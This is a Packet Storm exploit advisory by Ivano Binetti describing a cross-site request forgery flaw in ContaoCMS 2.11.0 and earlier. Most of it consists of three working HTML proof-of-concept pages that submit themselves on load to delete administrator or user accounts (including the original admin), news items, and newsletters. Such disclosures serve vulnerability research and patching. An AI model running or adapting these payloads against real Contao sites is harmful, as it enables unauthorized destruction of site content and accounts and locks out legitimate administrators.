ContaoCMS 2.11.0 Cross Site Request Forgery

2012-02-27T00:00:00
ID PACKETSTORM:110214
Type packetstorm
Reporter Ivano Binetti
Modified 2012-02-27T00:00:00

Description

                                        
                                            `+--------------------------------------------------------------------------------------------------------------------------------+  
# Exploit Title : ContaoCMS (fka TYPOlight) <= 2.11 CSRF (Delete Admin- Delete Article)  
# Date : 25-02-2012  
# Author : Ivano Binetti (http://ivanobinetti.com)  
# Software link : http://www.contao.org/en/download.html  
# Vendor site : http://www.contao.org  
# Version : 2.11.0 (latest) and lower   
# Tested on : Debian Squeeze (6.0)   
+--------------------------------------------------------------------------------------------------------------------------------+  
+------------------------------------------[Multiple Vulnerabilities by Ivano Binetti]-------------------------------------------+  
  
Summary  
1)Introduction  
2)Vulnerabilities Description  
2.1 Delete Administrators or Users   
2.2 Delete News  
2.3 Delete Newsletter  
+--------------------------------------------------------------------------------------------------------------------------------+  
1)Introduction  
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that  
is easy to maintain".  
  
2)Vulnerabilities Description  
Contao 2.11 (and lower) is affected by CSRF Vulnerability which allows an attacker to delete admins/users, delete web pages   
(articles, news, newsletter and so on).  
  
2.1 Delete Administrators or Users  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2>CSRF Exploit to delete ADMIN/USER account</H2>  
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=user&act=delete&id=2">  
</body>  
</html>  
  
Note that the is possible to delete any admin/user, also the first administrator (id=1) created during Contao's installation phase.  
  
2.2 Delete News  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2>CSRF Exploit to delete News</H2>  
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/main.php?do=news&act=delete&id=1">  
</form>  
</body>  
</html>  
  
  
2.3 Delete Newsletter   
<html>  
<body onload="javascript:document.forms[0].submit()">  
<H2>CSRF Exploit to delete Newsletter</H2>  
<form method="POST" name="form0" action="http://<contao_ip>:80/contao/contao/main.php?do=newsletter&act=delete&id=1">  
</form>  
</body>  
</html>  
+--------------------------------------------------------------------------------------------------------------------------------+  
  
`